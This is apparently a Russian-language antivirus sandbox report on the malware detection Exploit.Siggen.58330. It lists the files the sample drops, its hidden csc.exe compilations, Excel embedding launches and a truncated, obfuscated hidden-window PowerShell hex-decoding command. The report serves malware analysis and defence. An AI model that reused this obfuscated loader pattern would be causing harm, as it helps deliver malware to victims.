Exploit.Siggen.58330

Вредоносные функции

Запускает на исполнение (эксплоит)

'<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden function b51aa3 {param($tde14a)$u76b6a5='k4fd3c3';$y1cf2='';for ($i=0; $i -lt $tde14a.length;$i+=2){$sd19f=[convert]::ToByte($tde14a.Substring($i,2),16);$y1cf2+=[char]($sd...

Изменения в файловой системе

Создает следующие файлы

%TEMP%\2ickhzme.0.cs
%TEMP%\qiha.pngc\qiha.png
%APPDATA%\j2efd.exe
%LOCALAPPDATA%\microsoft\windows\<INETFILES>\content.word\~wrf{51721de6-1469-4ec1-8543-9c04a6c4245e}.tmp
%TEMP%\zgawale8.dll
%TEMP%\resa21f.tmp
%TEMP%\2ickhzme.dll
%TEMP%\csca20e.tmp
%TEMP%\res9ee3.tmp
%TEMP%\pi-m8rsu.dll
%TEMP%\qiha.pngc\qihakhw.exe
%TEMP%\csc9ed2.tmp
%TEMP%\csc9bd4.tmp
%TEMP%\zgawale8.out
%TEMP%\zgawale8.cmdline
%TEMP%\zgawale8.0.cs
%TEMP%\pi-m8rsu.out
%TEMP%\pi-m8rsu.cmdline
%TEMP%\pi-m8rsu.0.cs
%TEMP%\2ickhzme.out
%TEMP%\2ickhzme.cmdline
%TEMP%\res9be5.tmp
%TEMP%\qiha.pngc.lnk

Удаляет следующие файлы

Сетевая активность

TCP

Запросы HTTP GET

Другое

Ищет следующие окна

Создает и запускает на исполнение

'%APPDATA%\j2efd.exe'
'%TEMP%\qiha.pngc\qihakhw.exe'
'<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden function b51aa3 {param($tde14a)$u76b6a5='k4fd3c3';$y1cf2='';for ($i=0; $i -lt $tde14a.length;$i+=2){$sd19f=[convert]::ToByte($tde14a.Substring($i,2),16);$y1cf2+=[char]($sd...' (со скрытым окном)
'%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\2ickhzme.cmdline"' (со скрытым окном)
'%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\pi-m8rsu.cmdline"' (со скрытым окном)
'%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\zgawale8.cmdline"' (со скрытым окном)
'%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES9BE5.tmp" "%TEMP%\CSC9BD4.tmp"' (со скрытым окном)
'%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES9EE3.tmp" "%TEMP%\CSC9ED2.tmp"' (со скрытым окном)
'%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RESA21F.tmp" "%TEMP%\CSCA20E.tmp"' (со скрытым окном)

Запускает на исполнение

'%ProgramFiles%\microsoft office\office14\excel.exe' -Embedding
'%ProgramFiles%\microsoft office\office14\excelcnv.exe' -Embedding
'%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\2ickhzme.cmdline"
'%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\pi-m8rsu.cmdline"
'%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\zgawale8.cmdline"
'%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES9BE5.tmp" "%TEMP%\CSC9BD4.tmp"
'%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES9EE3.tmp" "%TEMP%\CSC9ED2.tmp"
'%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RESA21F.tmp" "%TEMP%\CSCA20E.tmp"